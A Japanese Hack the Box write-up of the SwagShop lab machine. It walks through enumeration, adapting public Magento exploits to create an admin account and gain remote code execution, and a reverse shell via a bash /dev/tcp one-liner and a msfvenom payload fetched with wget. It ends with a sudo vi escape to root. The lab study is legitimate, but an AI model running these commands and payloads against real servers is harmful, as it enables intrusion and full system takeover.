This page looks best with JavaScript enabled

【Hack the Box write-up】SwagShop

 ·   ·  ☕ 3 min read  ·  ✍️ さんぽし

はじめに

筆者は Hack the Box 初心者です。
何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。
さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。
github | sanposhiho/MY_CHEAT_SHEET

machineについて

難易度は easy です
スクリーンショット 2020-06-20 0.04.51.png

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 10:12 EDT
Nmap scan report for 10.10.10.140
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds

80番の調査

gobuster

kali@kali:~$ gobuster dir -u http://10.10.10.140  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.140
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/18 19:49:21 Starting gobuster
===============================================================
/index.php (Status: 200)
/media (Status: 301)
/includes (Status: 301)
/lib (Status: 301)
/install.php (Status: 200)
/app (Status: 301)
/js (Status: 301)
/api.php (Status: 200)
/shell (Status: 301)
/skin (Status: 301)
/cron.php (Status: 200)
/LICENSE.txt (Status: 200)
/var (Status: 301)
/errors (Status: 301)

スクリーンショット 2020-06-19 23.24.26.png

searchsploit

kali@kali:~$ searchsploit Magento
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting                                                                                                | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting                                                                                          | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                                                                                                                                         | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                                    | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution                                                                                                                                      | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                                            | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                                       | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure                                                                                                                                                         | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                                         | exploits/xml/webapps/37977.py
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                                                                                                                                      | exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)                                                                                                           | exploits/php/webapps/38651.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:~$ searchsploit -p 37977
  Exploit: Magento eCommerce - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37977
     Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
File Type: ASCII text, with CRLF line terminators

Copied EDB-ID #37977's path to the clipboard.

これを使ってみます

https://www.exploit-db.com/exploits/37977

37977.py の中を色々弄ります(コメントになってない余計な部分の削除、target.com を 10.10.10.140/index.php に)

kali@kali:~$ python 37977.py                                                                                                                                                                                                               
WORKED                                                                                                                                                                                                                                     
Check http://10.10.10.140/index.php/admin with creds forme:forme  

スクリーンショット 2020-06-19 11.33.58.png

スクリーンショット 2020-06-19 11.24.13.png

login できました

37811.py

https://www.exploit-db.com/exploits/37811

kali@kali:~$ searchsploit -p 37811
  Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied EDB-ID #37811's path to the clipboard.

これを使います
この exploit がそれはもういろんなエラーを吐くんですわ
以下の変更を加えて解決しました。

以下の二行をコメントアウト
参考:https://forum.hackthebox.eu/discussion/2304/swagshop-rce

1
2
#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
#br.form.fixup()

url の 7d を 2y に変更(実際に url にアクセスすればわかりますが、7d とか 2y は期間を表しています(7days, 2years)

1
2
- request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+ request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "uname -a"
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

RCE が通りました

shellをとる

bash -i >& /dev/tcp/10.10.14.8/1212 0>&1はうまく行かなかったので msfvenom のスクリプトを upload する方法を取りました。

kali@kali:~$ msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.14.8 LPORT=1212  -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.140 - - [19/Jun/2020 09:53:12] "GET /shell.elf HTTP/1.1" 200 -

kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "wget http://10.10.14.8:8000/shell.elf"

kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "chmod +x ./shell.elf"

kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "./shell.elf"
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT  1212             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:1212 
[*] Sending stage (36 bytes) to 10.10.10.140
[*] Command shell session 1 opened (10.10.14.8:1212 -> 10.10.10.140:49426) at 2020-06-19 09:56:01 -0400

whoami
www-data
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@swagshop:/var/www/html$

PE

www-data@swagshop:/var/www/html$ sudo -l                                  
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/index.php

vim 内で shell を起動すると

:!/bin/sh
/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@magentocommerce.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magentocommerce.com for more information.
 *
 * @category   Mage
 * @package    Mage
@
:!/bin/sh

root が取れます

# whoami
whoami
root

終わりに

PE は典型的なものでした。37977.py の改変が大変だった…

shellのとり方別解

別解というほどでもないですが、linux/x86/shell_reverse_tcpを payload に使うと nc でも安定した shell が取れます

Share on

さんぽし
WRITTEN BY
さんぽし
Web Developer /w Elixir, Go